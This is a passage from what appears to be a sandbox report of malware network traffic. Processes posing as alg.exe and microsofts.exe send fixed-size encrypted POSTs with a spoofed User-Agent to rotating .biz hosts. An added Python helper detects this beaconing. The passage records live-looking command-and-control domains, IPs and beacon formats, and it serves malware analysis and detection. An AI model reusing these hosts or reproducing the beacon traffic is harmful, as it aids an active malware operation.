Oct 10, 2024 10:09:11.158030033 CEST | 778 | OUT | Data Raw: bf c9 aa f9 69 70 07 33 fe 02 00 00 7b 06 4e fd e2 c7 0b f6 03 fc 9f 44 ab 98 99 34 0c 6c 64 56 73 1d 48 39 03 85 51 6c a4 de 8d 1c 6a 4a d1 f1 81 96 64 f9 3b ed 54 6e e6 1c 3c 26 59 f2 b9 5c 7c 16 01 6d fb bf 1b 31 a7 0d 7a 8c 47 5a bb b2 cd f1
  Data Ascii: ip3{ND4ldVsH9QljJd;Tn<&Y\|m1zGZ;jGgSZ.GhpjCR|*|N_b&rNHDObwQ9GY{NI{?EwLDVLlwLxp}AgF@M!)Sp


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
111        | 192.168.2.5 | 51601       | 18.141.10.107  | 80               | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:11.321491957 CEST | 347 | OUT | POST /rrlwj HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: whjovd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:11.321505070 CEST | 778 | OUT | Data Raw: 08 00 02 6d 4b 04 ce be fe 02 00 00 eb f7 b7 28 7f e7 b1 e7 bb 57 4f 58 2d 6e 25 e5 55 a0 1e 0f 83 f7 20 1d 3a a0 c6 68 93 35 ac ed e6 53 c5 e6 a6 ca 3d 3d ea b2 a1 31 4e 4a 64 6a 8a 0d 30 f8 33 bf f2 95 9e 18 9c b1 3a da 4c b7 9e 47 36 3f a1 48
  Data Ascii: mK(WOX-n%U :h5S==1NJdj03:LG6?HapKzz@|Ll 9O}?9_O2>[Shh#_`(c^)^8~.tZ)Cx4A{l;#h|7SeNoSA*-E=tYxGp<+5(8Uy


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
112        | 192.168.2.5 | 51602       | 18.141.10.107  | 80               | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:11.354053020 CEST | 356 | OUT | POST /bteutovkpfgbea HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: whjovd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:11.354195118 CEST | 778 | OUT | Data Raw: 6d 91 3f 58 52 85 b4 45 fe 02 00 00 16 27 4e 0c 41 b7 05 98 45 f3 57 91 61 d7 cc a9 0a b0 5f 80 1b dc b1 da a4 ce 11 73 b1 0c cc 49 5c 73 cb 0f f5 e0 d9 9f 72 32 62 51 c2 9c 8d f4 22 10 6d 32 ce bd a9 39 11 82 52 75 ad d1 2c 0c 17 39 82 68 1e 97
  Data Ascii: m?XRE'NAEWa_sI\sr2bQ"m29Ru,9hTg0FkGa"-44?]n!/ T0@7SE`.9aBq[xfe6,`T9rt:>mPi)g4wVno


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
113        | 192.168.2.5 | 51603       | 208.100.26.245 | 80               | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:11.525702953 CEST | 361 | OUT | POST /ikwdwlrjrslefrvs HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gjogvvpsf.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:11.525855064 CEST | 778 | OUT | Data Raw: 32 f9 af a0 03 e9 fb a5 fe 02 00 00 d0 99 f1 15 1c df 48 05 16 74 ba 32 43 92 77 eb ea 25 32 d6 ad 22 a5 4d 44 03 2c 16 94 6b 9e 2a 19 c5 cf e0 8a 4b cc 3f 28 cf 03 23 36 bc 01 10 42 78 2a cc 00 f0 bd 85 9d 3d a8 39 0b 8b e0 e5 d5 6a 0e 13 5b 88
  Data Ascii: 2Ht2Cw%2"MD,k*K?(#6Bx*=9j[vV',IXt{(CDm&>Ls}W]XALK5:<92}OvX);Pz4hT@s&fBZ;oJ=W$P1@<
Oct 10, 2024 10:09:12.057127953 CEST | 744 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.14.0 (Ubuntu)
  Date: Thu, 10 Oct 2024 08:09:11 GMT
  Content-Type: text/html
  Content-Length: 580
  Connection: keep-alive
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 10, 2024 10:09:12.100980997 CEST | 359 | OUT | POST /xvwjoyasecofgd HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gjogvvpsf.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Oct 10, 2024 10:09:12.101013899 CEST | 778 | OUT | Data Raw: dd 43 ff f2 d2 75 70 c3 fe 02 00 00 8a 25 65 4d 31 09 69 62 68 6f 7f e8 bb 27 e5 7b da 4e 37 83 29 b3 b7 63 ce e7 63 14 29 05 64 a4 db 2a 2d a5 35 be 74 1c fa d7 28 85 ca f4 0c d4 81 e6 aa 09 0e 6a a2 b3 19 7f 6b b4 10 82 70 31 da 9b 3d bb d5 d5
  Data Ascii: Cup%eM1ibho'{N7)cc)d*-5t(jkp1=:erP]~2>WV4O)idpiRlj"Ajc{Klv<b_CF:HL9yW0E_(+m1AQBPo"we\Ok
Oct 10, 2024 10:09:12.215162039 CEST | 744 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.14.0 (Ubuntu)
  Date: Thu, 10 Oct 2024 08:09:12 GMT
  Content-Type: text/html
  Content-Length: 580
  Connection: keep-alive
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
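
The sessions above share one shape: a Windows system binary (alg.exe, PID 7120) issues POST requests with short lower-case, letters-only paths and a constant Content-Length of 778 to a different .biz host every few hundred milliseconds, carrying a WeChat/QQBrowser User-Agent that no system service would legitimately send, and each body opens with eight varying bytes followed by fe 02 00 00, which read little-endian is 766, exactly 778 minus 12. The Python below is an added triage helper and is not part of the Joe Sandbox report. It parses the per-request rows in the flattened form the page shows ("<timestamp> CEST<bytes><IN|OUT><data>") and emits those indicators. The SESSIONS list is constructed from sessions 110, 111 and 113 above with the session columns split out by hand and each Data Raw row cut to its first 16 bytes; the 12-byte-header reading of the body, the 5-second churn window and the browser list are assumptions chosen for illustration.

```python
import re
import struct
from collections import defaultdict
from datetime import datetime, timedelta

UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

# Constructed sample: sessions 110, 111 and 113 from the report, session
# columns split by hand, "Data Raw" cut to 16 bytes (checks need only 12).
SESSIONS = [
    {"pid": 7120, "process": r"C:\Windows\System32\alg.exe", "rows": [
        "Oct 10, 2024 10:09:11.157978058 CEST360OUTPOST /vjmakoegwejtsrok HTTP/1.1",
        "Host: tnevuluw.biz", "User-Agent: " + UA, "Content-Length: 778",
        "Oct 10, 2024 10:09:11.158030033 CEST778OUTData Raw: bf c9 aa f9 69 70 07 33 fe 02 00 00 7b 06 4e fd",
    ]},
    {"pid": 7120, "process": r"C:\Windows\System32\alg.exe", "rows": [
        "Oct 10, 2024 10:09:11.321491957 CEST347OUTPOST /rrlwj HTTP/1.1",
        "Host: whjovd.biz", "User-Agent: " + UA, "Content-Length: 778",
        "Oct 10, 2024 10:09:11.321505070 CEST778OUTData Raw: 08 00 02 6d 4b 04 ce be fe 02 00 00 eb f7 b7 28",
    ]},
    {"pid": 7120, "process": r"C:\Windows\System32\alg.exe", "rows": [
        "Oct 10, 2024 10:09:11.525702953 CEST361OUTPOST /ikwdwlrjrslefrvs HTTP/1.1",
        "Host: gjogvvpsf.biz", "User-Agent: " + UA, "Content-Length: 778",
        "Oct 10, 2024 10:09:11.525855064 CEST778OUTData Raw: 32 f9 af a0 03 e9 fb a5 fe 02 00 00 d0 99 f1 15",
        "Oct 10, 2024 10:09:12.057127953 CEST744INHTTP/1.1 404 Not Found",
        "Server: nginx/1.14.0 (Ubuntu)", "Content-Length: 580",
    ]},
]

# "<Mon d, yyyy hh:mm:ss.nnnnnnnnn> CEST<bytes><IN|OUT><data>", as the page shows it.
ROW = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) CEST"
                 r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<data>.*)$")
REQ = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "wechat.exe"}  # assumed
HEADER_LEN = 12  # assumption: 8 varying bytes, then a 4-byte little-endian length


def parse_ts(ts):
    head, frac = ts.rsplit(".", 1)  # strptime accepts at most 6 fractional digits
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(rows):
    """A timestamped row opens a request, response or body chunk; bare
    'Name: value' rows are headers of the message opened last."""
    msgs, cur = [], None
    for row in rows:
        m = ROW.match(row)
        if not m:
            if cur is not None and ": " in row and not row.startswith("Data Ascii:"):
                name, value = row.split(": ", 1)
                cur["headers"][name.lower()] = value
            continue
        data = m["data"]
        if data.startswith("Data Raw: "):
            if cur is not None:
                cur["body"] = bytes.fromhex(data[10:].replace("[TRUNCATED]", ""))
            continue
        cur = {"ts": parse_ts(m["ts"]), "dir": m["dir"], "size": int(m["size"]),
               "line": data, "headers": {}, "body": b""}
        r = REQ.match(data)
        if r:
            cur["method"], cur["path"] = r["method"], r["path"]
        msgs.append(cur)
    return msgs


def framed(req):
    """True when bytes 8..11 of the body, little-endian, equal Content-Length - 12."""
    body, declared = req["body"], req["headers"].get("content-length")
    if len(body) < HEADER_LEN or declared is None:
        return False
    return struct.unpack_from("<I", body, 8)[0] == int(declared) - HEADER_LEN


def triage(sessions):
    per_proc = defaultdict(list)
    for s in sessions:
        for msg in parse_rows(s["rows"]):
            if msg["dir"] == "OUT" and "method" in msg:
                per_proc[(s["pid"], s["process"])].append(msg)
    findings = []
    for (pid, proc), reqs in per_proc.items():
        tag, exe = f"{proc} (PID {pid})", proc.rsplit("\\", 1)[-1].lower()
        if proc.lower().startswith(SYSTEM_DIRS):
            findings.append(("system-binary-http", f"{tag} issues {len(reqs)} HTTP request(s)"))
        if "Chrome/" in reqs[0]["headers"].get("user-agent", "") and exe not in BROWSERS:
            findings.append(("browser-ua-from-non-browser", f"{tag} sends a browser User-Agent"))
        hosts = {r["headers"].get("host") for r in reqs}
        span = max(r["ts"] for r in reqs) - min(r["ts"] for r in reqs)
        random_paths = sum(bool(re.fullmatch(r"/[a-z]{4,24}", r["path"])) for r in reqs)
        if len(hosts) >= 3 and span <= timedelta(seconds=5):
            findings.append(("host-churn", f"{tag} reached {len(hosts)} hosts in "
                             f"{span.total_seconds():.3f}s, {random_paths} letters-only paths"))
        lengths = {r["headers"].get("content-length") for r in reqs}
        if len(hosts) >= 2 and len(lengths) == 1:
            findings.append(("fixed-size-beacon", f"{tag} posts {lengths.pop()} bytes to every host"))
        if reqs and all(framed(r) for r in reqs):
            findings.append(("length-prefixed-body", f"{tag}: every body carries "
                             f"Content-Length minus {HEADER_LEN} at offset 8, little-endian"))
    return findings


if __name__ == "__main__":
    for code, detail in triage(SESSIONS):
        print(f"[{code}] {detail}")
```

Run as a script it prints one line per finding for the process group above. The length-field check is the one worth confirming in a debugger before relying on it: the report only shows that the four bytes at offset 8 are the same in every body, and the 12-byte header reading is this helper's hypothesis, not something the sandbox states.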


Session ID: 114 | Source IP: 192.168.2.5 | Source Port: 51604 | Destination IP: 34.211.97.45 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.284585953 CEST | Bytes transferred: 347 | Direction: OUT | Data:
POST /majxvi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.284585953 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 115 | Source IP: 192.168.2.5 | Source Port: 51605 | Destination IP: 34.211.97.45 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.296545982 CEST | Bytes transferred: 348 | Direction: OUT | Data:
POST /xtlulck HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.296545982 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 116 | Source IP: 192.168.2.5 | Source Port: 51606 | Destination IP: 3.94.10.34 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.323173046 CEST | Bytes transferred: 361 | Direction: OUT | Data:
POST /dnygdywcggkonbfe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.323195934 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 117 | Source IP: 192.168.2.5 | Source Port: 51607 | Destination IP: 3.94.10.34 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.335114002 CEST | Bytes transferred: 354 | Direction: OUT | Data:
POST /njgjrpxmf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.335136890 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 118 | Source IP: 192.168.2.5 | Source Port: 51608 | Destination IP: 44.213.104.86 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.361186981 CEST | Bytes transferred: 345 | Direction: OUT | Data:
POST /rd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.361239910 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 119 | Source IP: 192.168.2.5 | Source Port: 51609 | Destination IP: 44.213.104.86 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.374170065 CEST | Bytes transferred: 345 | Direction: OUT | Data:
POST /wi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.374262094 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 120 | Source IP: 192.168.2.5 | Source Port: 51610 | Destination IP: 3.254.94.185 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.399497032 CEST | Bytes transferred: 355 | Direction: OUT | Data:
POST /sqaajldpmyrnnl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:12.399528980 CEST | Bytes transferred: 828 | Direction: OUT | Data: binary POST body (hex and ASCII dump omitted)


Session ID: 121 | Source IP: 192.168.2.5 | Source Port: 51611 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp: Oct 10, 2024 10:09:12.409859896 CEST | Bytes transferred: 355 | Direction: OUT | Data:
POST /cgofyarxpklm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID: 122 | Source IP: 192.168.2.5 | Source Port: 51612 | Destination IP: 3.254.94.185 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.411799908 CEST | Bytes transferred: 350 | Direction: OUT | Data:
POST /cgtrhhgqi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828


Session ID: 123 | Source IP: 192.168.2.5 | Source Port: 51613 | Destination IP: 85.214.228.140 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.450635910 CEST | Bytes transferred: 349 | Direction: OUT | Data:
POST /qtgyq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828


Session ID: 124 | Source IP: 192.168.2.5 | Source Port: 51614 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp: Oct 10, 2024 10:09:12.464559078 CEST | Bytes transferred: 349 | Direction: OUT | Data:
POST /wcihxt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID: 125 | Source IP: 192.168.2.5 | Source Port: 51615 | Destination IP: 85.214.228.140 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.466159105 CEST | Bytes transferred: 359 | Direction: OUT | Data:
POST /ymrgibjtpgrltdn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828


Session ID: 126 | Source IP: 192.168.2.5 | Source Port: 51617 | Destination IP: 47.129.31.212 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.530905962 CEST | Bytes transferred: 352 | Direction: OUT | Data:
POST /entqbvydd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828


Session ID: 127 | Source IP: 192.168.2.5 | Source Port: 51618 | Destination IP: 34.211.97.45 | Destination Port: 80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp: Oct 10, 2024 10:09:12.558228016 CEST | Bytes transferred: 345 | Direction: OUT | Data:
POST /rhvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Timestamp: Oct 10, 2024 10:09:13.279443026 CEST | Bytes transferred: 407 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=66ed27e3a6a78e0da352f1cb6c30b9a2|8.46.123.33|1728547753|1728547753|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 128 | Source IP: 192.168.2.5 | Source Port: 51619 | Destination IP: 34.211.97.45 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:12.721726894 CEST | 358 | OUT | POST /csepohryabqocrsd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:12.721760988 CEST | 778 | OUT | Data Raw: fd 21 97 c2 0e 71 65 60 fe 02 00 00 b7 75 05 96 1e 67 04 a2 48 c3 54 07 ae eb 02 64 c3 5a 12 e0 98 d8 7e 8e 7f 11 93 0f 30 4c 74 80 63 a3 8e b0 5d f6 22 93 aa be 32 48 a5 00 cc 40 cb 3e 58 58 54 39 d6 c4 8b 47 54 d4 06 aa ec 69 d7 5e 96 43 44 28
Data Ascii: !qe`ugHTdZ~0Ltc]"2H@>XXT9GTi^CD(}yiYA{Vw2URilyEzp%'_D+BF,9K!6GL|\='mrTK0S-K#awB]5'M9]`9S]]\8
